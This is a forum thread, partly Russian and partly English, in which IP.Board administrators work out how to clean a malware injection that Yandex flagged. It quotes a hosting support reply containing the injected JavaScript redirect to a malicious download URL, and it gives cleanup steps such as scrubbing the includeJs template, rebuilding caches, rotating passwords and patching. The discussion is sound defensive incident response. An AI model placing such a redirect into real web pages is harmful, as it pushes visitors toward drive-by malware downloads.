Перейти к публикации
View in the app

A better way to browse. Learn more.
Дизайн и модификация Invision Community

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Яндекс обнаружил вредоносный код на форуме

Опубликовано:

Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215'

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

Рекомендованные сообщения

Опубликовано:
  • Автор

Проверка была до того как я сделал то, что вы сказали.

Я запросил перепроверку еще 2-го числа, ответа пока нету - сижу жду.

Очень надеюсь, что ваши рекомендации возымели действие.

Опубликовано:

Админ отписался, что пытались авторизироватся в АЦ с двумя админских аккаунтов (из трех). Пытались один раз для каждого аккаунта. Пароли использовали конкретные, не случайные, что подтверждает предположение взлома через инъекцию и утечку паролей администраторов.

Метка зараженного сайта с него уже сняли после перепроверке в яндекс вебмастере (примерно за три - четыре дня).

Опубликовано:
  • Автор

Наконец-то прошла перепроверка и радость:

 

Последняя проверка сайта 9 Февраля 2015 не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.

 

Огромное спасибо всем и особенно siv1987!!!

 

Сделал для себя вывод, что медлить с установкой патчей никогда не стоит.

Опубликовано:

Guys i have identical problem but i cant find solution.

Can i write here in english language?

Опубликовано:

The solution for this problem is on the first page of the second message. Use google translate.

 

Основная суть лечения заключается в:
Опубликовано:

You have a virus. Can check this at url myforum.pl/index.php?ipbv=hash&g=js White page means that the forum is infected. You need:

- delete virus from template includeJs, group Globals in admincenter (from all skins). Sometimes the virus is left only in the cache, so proceed to the next step.

- rebuild skins cache

- change passwords all users who have access in admincenter! It is very important.

- change password from database

- change password form ftp

- install the all latest security patches or upgrade to latest version

- additionally find shells on ftp

Опубликовано:

Yea i saw that. But i hawe question. On my comunity i have 2 skins. And i dont really know is my includeJS is clean from suspicius code. Below i paste two of my files. Please check it for aditional suspicius code:

 

http://wklej.org/id/1637307/
http://wklej.org/id/1637306/

 

Thx a lot

Опубликовано:

Sometimes the virus is in only the cache. Then you need to rebuild caches skins to remove malware from cache - Template Tools -> Recache Skin Sets

Опубликовано:

Sometimes the virus is in only the cache. Then you need to rebuild caches skins to remove malware from cache - Template Tools -> Recache Skin Sets

 

After this issue is gone, but it back after couple days. But i saw sometching strange. its back always in monday. I was check in ACP and only one cron job runs every monday:

 

http://prntscr.com/65vsnt

 

is this posible the problem is something there ?

Опубликовано:
After this issue is gone, but it back after couple days.

You change the password of all administrators? Change password from db? It is important, because allegedly hacking occurs through leakage of passwords. Also, be sure to install the all latest security patches.

 

is this posible the problem is something there ?

Maybe. But this is a standard task, need to watch the code from this task. Attach the file /admin/applications/core/tasks/minifycleanup.php

Опубликовано:

For now i do

- rebuild skins cache

- change passwords all users who have access in admincenter! It is very important.

- change password from database

- change password form ftp

- additionally find shells on ftp <-----------------dont find any strange files

 

 

minifycleanup.php but its after recache

 

http://wklej.org/id/1637342/

Опубликовано:

minifycleanup.php but its after recache

Minify is clean.

 

For now i do

Ok. Now wait and watch the forum. Pay attention the unsuccessful attempts to log in the admincenter. More code should not appear. If appears again, need a more comprehensive approach to the problem. Most likely somewhere there is a backdoor that want to find.

Опубликовано:

Ok... for now i send to you BIG THANKS

Опубликовано:

You are install the latest security patches from the november 2014? Version 3.4.7 installed before this date is vulnerable. Make sure that your distribution is fresh.

Опубликовано:

I do fresh install of ipb 3.4.7 in january

Создайте аккаунт или войдите в него для комментирования

Перейти к списку тем

Сейчас на странице 0

  • Нет пользователей, просматривающих эту страницу.

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.